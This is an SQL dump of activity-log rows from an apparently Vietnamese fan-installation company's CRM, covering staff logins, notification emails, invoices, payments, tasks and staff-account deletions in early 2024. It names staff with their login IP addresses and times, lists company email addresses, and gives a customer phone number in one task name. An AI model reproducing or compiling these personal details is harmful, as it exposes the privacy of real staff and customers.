(11610, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-23 16:15:54', 'Tâm Nguyen Thanh'),
(11611, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-24 08:04:15', 'Loan Nguyễn'),
(11612, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: New Ticket Created (Opened by Customer, Sent to Staff Members) [vietnamese]]', '2024-02-24 09:34:03', NULL),
(11613, 'Email Sent To [Email: ketoan@hogiaphat.vn, Template: New Ticket Created (Opened by Customer, Sent to Staff Members) [vietnamese]]', '2024-02-24 09:34:06', NULL),
(11614, 'Email Sent To [Email: sale@hogiaphat.vn, Template: New Ticket Created (Opened by Customer, Sent to Staff Members) [vietnamese]]', '2024-02-24 09:34:10', NULL),
(11615, 'Email Sent To [Email: congho@hogiaphat.vn, Template: New Ticket Created (Opened by Customer, Sent to Staff Members) [vietnamese]]', '2024-02-24 09:34:13', NULL),
(11616, 'Email Sent To [Email: cong@hamiltonair.vn, Template: New Ticket Opened - Autoresponse]', '2024-02-24 09:34:13', NULL),
(11617, 'New Ticket Created [ID: 87]', '2024-02-24 09:34:13', NULL),
(11618, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-24 09:34:26', 'Admin Hamilton'),
(11619, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-24 09:35:12', 'Admin Hamilton'),
(11620, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-24 10:02:13', 'Tâm Nguyen Thanh'),
(11621, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-24 11:28:57', 'Admin Hamilton'),
(11622, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Overdue Notice]', '2024-02-25 01:00:06', '[CRON]'),
(11623, 'Email Sent To [Email: cong@hamiltonair.vn, Template: Auto Close Ticket]', '2024-02-25 09:45:05', '[CRON]'),
(11624, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-25 21:34:46', 'Admin Hamilton'),
(11625, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 08:09:40', 'Loan Nguyễn'),
(11626, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 08:16:16', 'Loan Nguyễn'),
(11627, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 10:39:26', 'Tâm Nguyen Thanh'),
(11628, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 15:51:24', 'Admin Hamilton'),
(11629, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 16:15:25', 'Tiến Cao Minh'),
(11630, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 16:15:28', 'Tiến Cao Minh'),
(11631, 'Email Sent To [Email: tamnguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-26 16:15:51', 'Tiến Cao Minh'),
(11632, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-26 16:15:51', 'Tiến Cao Minh'),
(11633, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-26 16:15:51', 'Tiến Cao Minh'),
(11634, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-26 16:16:02', 'Tiến Cao Minh'),
(11635, 'New Client Created [ID: 1445, From Staff: 17]', '2024-02-26 17:08:01', 'Loan Nguyễn'),
(11636, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-26 21:17:22', 'Admin Hamilton'),
(11637, 'Email Sent To [Email: tien@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-26 21:17:53', 'Admin Hamilton'),
(11638, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-26 21:17:53', 'Admin Hamilton'),
(11639, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-27 08:18:08', 'Loan Nguyễn'),
(11640, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-27 11:39:39', 'Tâm Nguyen Thanh'),
(11641, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-27 14:01:42', 'Tiến Cao Minh'),
(11642, 'Invoice Status Updated [Invoice Number: INV-387-24, From: Chưa thanh toán To: Đã thanh toán]', '2024-02-27 14:35:33', 'Loan Nguyễn'),
(11643, 'Payment Recorded [ID:404, Invoice Number: INV-387-24, Total: 4.875.000 đ]', '2024-02-27 14:35:33', 'Loan Nguyễn'),
(11644, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-27 14:58:09', 'Admin Hamilton'),
(11645, 'New Client Created [ID: 1446, From Staff: 1]', '2024-02-27 14:58:47', 'Admin Hamilton'),
(11646, 'New Task Added [ID:168, Name: Hẹn khảo sát lắp đặt 3-4 quạt trần SUNON PS1 3m tại Thảo Điền - LH. 0819999433]', '2024-02-27 15:00:13', 'Admin Hamilton'),
(11647, 'Email Sent To [Email: tien@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-27 15:00:18', 'Admin Hamilton'),
(11648, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-27 15:00:22', 'Admin Hamilton'),
(11649, 'Email Sent To [Email: tien@hogiaphat.vn, Template: New Attachment(s) on Task (Sent to Staff)]', '2024-02-27 15:02:08', 'Admin Hamilton'),
(11650, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: New Attachment(s) on Task (Sent to Staff)]', '2024-02-27 15:02:08', 'Admin Hamilton'),
(11651, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-27 15:58:11', 'Tiến Cao Minh'),
(11652, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Overdue Notice]', '2024-02-28 01:00:05', '[CRON]'),
(11653, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 08:03:54', 'Tiến Cao Minh'),
(11654, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 08:05:27', 'Tiến Cao Minh'),
(11655, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-28 08:05:39', 'Tiến Cao Minh'),
(11656, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-02-28 08:05:39', 'Tiến Cao Minh'),
(11657, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 08:10:46', 'Loan Nguyễn'),
(11658, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 08:42:32', 'Tâm Nguyen Thanh'),
(11659, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 10:37:53', 'Admin Hamilton'),
(11660, 'Customer Info Updated [ID: 1356]', '2024-02-28 10:44:24', 'Loan Nguyễn'),
(11661, 'Customer Info Updated [ID: 1313]', '2024-02-28 11:02:21', 'Loan Nguyễn'),
(11662, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 11:32:08', 'Admin Hamilton'),
(11663, 'New Client Created [ID: 1447, From Staff: 1]', '2024-02-28 11:37:44', 'Admin Hamilton'),
(11664, 'Email Sent To [Email: tien@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-28 11:42:32', 'Admin Hamilton'),
(11665, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-28 11:42:32', 'Admin Hamilton'),
(11666, 'New Task Added [ID:169, Name: Khảo sát nhà thờ GX Tân Hiệp - ĐN]', '2024-02-28 11:42:32', 'Admin Hamilton'),
(11667, 'Customer Info Updated [ID: 1447]', '2024-02-28 11:45:53', 'Admin Hamilton'),
(11668, 'Customer Info Updated [ID: 1447]', '2024-02-28 11:45:58', 'Admin Hamilton'),
(11669, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-28 13:38:59', 'Admin Hamilton'),
(11670, 'Customer Info Updated [ID: 1447]', '2024-02-28 13:39:37', 'Admin Hamilton'),
(11671, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 27.68.65.33]', '2024-02-28 19:18:08', 'Tiến Cao Minh'),
(11672, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-29 08:16:36', 'Loan Nguyễn'),
(11673, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-29 08:21:30', 'Tâm Nguyen Thanh'),
(11674, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-29 09:49:22', 'Admin Hamilton'),
(11675, 'New Task Added [ID:170, Name: Làm báo giá quạt PS10 x 2 bộ - 7.3m - GX Tân Hiệp có mộc công ty]', '2024-02-29 09:50:44', 'Admin Hamilton'),
(11676, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-29 09:50:52', 'Admin Hamilton'),
(11677, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-29 17:09:01', 'Tâm Nguyen Thanh'),
(11678, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 27.68.65.33]', '2024-03-01 00:45:19', 'Tiến Cao Minh'),
(11679, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-01 08:12:08', 'Loan Nguyễn'),
(11680, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-01 08:20:32', 'Tâm Nguyen Thanh'),
(11681, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-01 08:22:15', 'Loan Nguyễn'),
(11682, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-01 16:28:27', 'Tâm Nguyen Thanh'),
(11683, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Overdue Notice]', '2024-03-02 01:00:05', '[CRON]'),
(11684, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-02 08:58:37', 'Loan Nguyễn'),
(11685, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-02 11:52:34', 'Tâm Nguyen Thanh'),
(11686, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-03 07:45:55', 'Admin Hamilton'),
(11687, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-04 08:02:30', 'Admin Hamilton'),
(11688, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-04 08:12:41', 'Loan Nguyễn'),
(11689, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-04 16:52:26', 'Admin Hamilton'),
(11690, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 11:59:31', 'Admin Hamilton'),
(11691, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 12:05:22', 'Loan Nguyễn'),
(11692, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:07:53', 'Admin Hamilton'),
(11693, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:13:12', 'Admin Hamilton'),
(11694, 'Email Sent To [Email: tien@hogiaphat.vn, Template: Staff Added as Project Member]', '2024-03-05 13:21:02', 'Admin Hamilton'),
(11695, 'Email Sent To [Email: tamnguyen@hogiaphat.vn, Template: Staff Added as Project Member]', '2024-03-05 13:21:02', 'Admin Hamilton'),
(11696, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Staff Added as Project Member]', '2024-03-05 13:21:02', 'Admin Hamilton'),
(11697, 'Email Sent To [Email: sale@hogiaphat.vn, Template: Staff Added as Project Member]', '2024-03-05 13:21:02', 'Admin Hamilton'),
(11698, 'Email Sent To [Email: congho@hogiaphat.vn, Template: Staff Added as Project Member]', '2024-03-05 13:21:02', 'Admin Hamilton'),
(11699, 'New Project Created [ID: 27]', '2024-03-05 13:21:02', 'Admin Hamilton'),
(11700, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:24:25', 'Admin Hamilton'),
(11701, 'Email Sent To [Email: tamnguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:38', 'Admin Hamilton'),
(11702, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:38', 'Admin Hamilton'),
(11703, 'Email Sent To [Email: congho@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:38', 'Admin Hamilton'),
(11704, 'Email Sent To [Email: tamnguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:44', 'Admin Hamilton'),
(11705, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:44', 'Admin Hamilton'),
(11706, 'Email Sent To [Email: tien@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:50', 'Admin Hamilton'),
(11707, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:24:50', 'Admin Hamilton'),
(11708, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:03', 'Admin Hamilton'),
(11709, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:03', 'Admin Hamilton'),
(11710, 'Email Sent To [Email: sale@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:03', 'Admin Hamilton'),
(11711, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:08', 'Admin Hamilton'),
(11712, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:08', 'Admin Hamilton'),
(11713, 'Email Sent To [Email: sale@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:08', 'Admin Hamilton'),
(11714, 'Email Sent To [Email: tamnguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:10', 'Admin Hamilton'),
(11715, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:10', 'Admin Hamilton'),
(11716, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:10', 'Admin Hamilton'),
(11717, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:29', 'Admin Hamilton'),
(11718, 'New Client Created [ID: 1448, From Staff: 17]', '2024-03-05 13:25:29', 'Loan Nguyễn'),
(11719, 'Email Sent To [Email: tien@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:45', 'Admin Hamilton'),
(11720, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-05 13:25:45', 'Admin Hamilton'),
(11721, 'Invoice Status Updated [Invoice Number: INV-389-24, From: Chưa thanh toán To: Đã thanh toán]', '2024-03-05 13:26:46', 'Loan Nguyễn'),
(11722, 'Payment Recorded [ID:405, Invoice Number: INV-389-24, Total: 6.020.000 đ]', '2024-03-05 13:26:46', 'Loan Nguyễn'),
(11723, 'Email Sent To [Email: tien@hogiaphat.vn, Template: New Project Discussion (Sent to Project Members)]', '2024-03-05 13:27:39', 'Admin Hamilton'),
(11724, 'Email Sent To [Email: tamnguyen@hogiaphat.vn, Template: New Project Discussion (Sent to Project Members)]', '2024-03-05 13:27:39', 'Admin Hamilton'),
(11725, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: New Project Discussion (Sent to Project Members)]', '2024-03-05 13:27:39', 'Admin Hamilton'),
(11726, 'Email Sent To [Email: sale@hogiaphat.vn, Template: New Project Discussion (Sent to Project Members)]', '2024-03-05 13:27:39', 'Admin Hamilton'),
(11727, 'Email Sent To [Email: congho@hogiaphat.vn, Template: New Project Discussion (Sent to Project Members)]', '2024-03-05 13:27:39', 'Admin Hamilton'),
(11728, 'Invoice Status Updated [Invoice Number: INV-390-24, From: Chưa thanh toán To: Đã thanh toán một phần]', '2024-03-05 13:30:42', 'Admin Hamilton'),
(11729, 'Payment Recorded [ID:406, Invoice Number: INV-390-24, Total: 120.000.000 đ]', '2024-03-05 13:30:42', 'Admin Hamilton'),
(11730, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 104.28.68.152]', '2024-03-05 13:32:42', 'Admin Hamilton'),
(11731, 'Invoice Status Updated [Invoice Number: INV-388-24, From: Chưa thanh toán To: Đã thanh toán một phần]', '2024-03-05 13:33:40', 'Admin Hamilton'),
(11732, 'Payment Recorded [ID:407, Invoice Number: INV-388-24, Total: 50.000.000 đ]', '2024-03-05 13:33:40', 'Admin Hamilton'),
(11733, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Payment Recorded (Sent to Customer)]', '2024-03-05 13:33:43', 'Admin Hamilton'),
(11734, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Invoice Payment Recorded (Sent to Staff)]', '2024-03-05 13:33:46', 'Admin Hamilton'),
(11735, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:34:10', 'Tiến Cao Minh'),
(11736, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:35:21', 'Admin Hamilton'),
(11737, 'Customer Info Updated [ID: 1430]', '2024-03-05 13:38:13', 'Admin Hamilton'),
(11738, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:41:34', 'Admin Hamilton'),
(11739, 'Database Backup [database_backup_2024-03-05-13-45-02-v3-1-4.zip]', '2024-03-05 13:45:02', '[CRON]'),
(11740, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 13:50:35', 'Tâm Nguyen Thanh'),
(11741, 'Invoice Item Updated [ID: 1951, Thi công lắp đặt đường dây điện cấp nguồn quạt]', '2024-03-05 13:51:01', 'Admin Hamilton'),
(11742, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 14:45:26', 'Admin Hamilton'),
(11743, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 15:37:52', 'Loan Nguyễn'),
(11744, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 16:24:55', 'Admin Hamilton'),
(11745, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-05 16:39:05', 'Admin Hamilton'),
(11746, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Overdue Notice]', '2024-03-06 01:00:04', '[CRON]'),
(11747, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-06 08:23:01', 'Tâm Nguyen Thanh'),
(11748, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-06 08:25:23', 'Loan Nguyễn'),
(11749, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-07 08:12:02', 'Loan Nguyễn'),
(11750, 'New Client Created [ID: 1449, From Staff: 17]', '2024-03-07 09:06:55', 'Loan Nguyễn'),
(11751, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-07 09:15:45', 'Admin Hamilton'),
(11752, 'Custom Field Status Changed [FieldID: 7 - Active: 1]', '2024-03-07 09:42:46', 'Admin Hamilton'),
(11753, 'Custom Field Updated [Tên/SĐT]', '2024-03-07 09:43:18', 'Admin Hamilton'),
(11754, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-07 09:44:59', 'Tâm Nguyen Thanh'),
(11755, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-07 13:05:56', 'Tiến Cao Minh'),
(11756, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-08 08:16:37', 'Tâm Nguyen Thanh'),
(11757, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-08 08:17:09', 'Loan Nguyễn'),
(11758, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-08 14:21:01', 'Admin Hamilton'),
(11759, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-08 16:52:26', 'Loan Nguyễn'),
(11760, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-09 22:24:25', 'Admin Hamilton'),
(11761, 'Task Updated [ID:161, Name: Kiểm tra lần 2 BH hư hỏng điều khiển]', '2024-03-09 22:26:18', 'Admin Hamilton'),
(11762, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-09 22:26:21', 'Admin Hamilton'),
(11763, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Task Status Changed (Sent to Staff) [vietnamese]]', '2024-03-09 22:26:21', 'Admin Hamilton'),
(11764, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-09 22:50:49', 'Admin Hamilton'),
(11765, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-09 23:03:04', 'Admin Hamilton'),
(11766, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Overdue Notice]', '2024-03-10 01:00:05', '[CRON]'),
(11767, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-10 21:30:42', 'Admin Hamilton'),
(11768, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-11 08:19:25', 'Tâm Nguyen Thanh'),
(11769, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-11 08:19:25', 'Tâm Nguyen Thanh'),
(11770, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-11 08:23:44', 'Loan Nguyễn'),
(11771, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-11 09:05:08', 'Admin Hamilton'),
(11772, 'Invoice Status Updated [Invoice Number: INV-391-24, From: Chưa thanh toán To: Đã thanh toán]', '2024-03-11 14:09:44', 'Loan Nguyễn'),
(11773, 'Payment Recorded [ID:408, Invoice Number: INV-391-24, Total: 350.000 đ]', '2024-03-11 14:09:44', 'Loan Nguyễn'),
(11774, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-12 08:14:47', 'Loan Nguyễn'),
(11775, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-12 08:22:46', 'Tâm Nguyen Thanh'),
(11776, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-03-12 14:54:50', 'Admin Hamilton'),
(11777, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 127.0.0.1]', '2024-03-19 17:42:03', 'Admin Hamilton'),
(11778, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 127.0.0.1]', '2024-03-20 17:14:15', 'Admin Hamilton'),
(11779, 'Invoice Item Updated [ID: 1947, sss]', '2024-03-20 17:33:11', 'Admin Hamilton'),
(11780, 'New Invoice Item Added [ID:1970, sdfa]', '2024-03-20 17:34:15', 'Admin Hamilton'),
(11781, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 127.0.0.1]', '2024-03-21 11:21:25', 'Admin Hamilton'),
(11782, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:23:43', 'Admin Hamilton'),
(11783, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:27:50', 'Admin Hamilton'),
(11784, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:28:13', 'Admin Hamilton'),
(11785, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:31:38', 'Admin Hamilton'),
(11786, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:32:32', 'Admin Hamilton'),
(11787, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:33:49', 'Admin Hamilton'),
(11788, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:35:09', 'Admin Hamilton'),
(11789, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:37:06', 'Admin Hamilton'),
(11790, 'Staff Member Updated [ID: 2, Cong Ho]', '2024-03-21 11:46:06', 'Admin Hamilton'),
(11791, 'Staff Member Updated [ID: 2, Cong Ho]', '2024-03-21 11:46:22', 'Admin Hamilton'),
(11792, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:50:01', 'Admin Hamilton'),
(11793, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 11:50:34', 'Admin Hamilton'),
(11794, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 14:17:32', 'Admin Hamilton'),
(11795, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 14:48:09', 'Admin Hamilton'),
(11796, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 14:52:20', 'Admin Hamilton'),
(11797, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 14:57:05', 'Admin Hamilton'),
(11798, 'Invoice Item Updated [ID: 1932, Bảo dưỡng, sửa chữa lắp đặt quạt]', '2024-03-21 15:14:23', 'Admin Hamilton'),
(11799, 'Proposal Updated [ID:31]', '2024-03-21 23:43:11', 'Admin Hamilton'),
(11800, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 127.0.0.1]', '2024-03-22 15:47:32', 'Admin Hamilton'),
(11801, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 127.0.0.1]', '2024-03-27 10:41:56', 'Admin Hamilton'),
(11802, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 127.0.0.1]', '2024-06-12 16:22:59', 'Admin Hamilton'),
(11803, 'Staff Member Updated [ID: 1, Admin WIT]', '2024-06-12 16:25:00', 'Admin Hamilton'),
(11804, 'Staff Member Updated [ID: 1, Admin WIT]', '2024-06-12 16:27:13', 'Admin WIT'),
(11805, 'Staff Member Deleted [Name: Trình Hồ, Data Transferred To: Admin WIT]', '2024-06-12 16:30:04', 'Admin WIT'),
(11806, 'Staff Member Deleted [Name: Tiến Cao Minh, Data Transferred To: Admin WIT]', '2024-06-12 16:30:10', 'Admin WIT'),
(11807, 'Staff Member Deleted [Name: Bộ phận XNK, Data Transferred To: Admin WIT]', '2024-06-12 16:30:15', 'Admin WIT'),
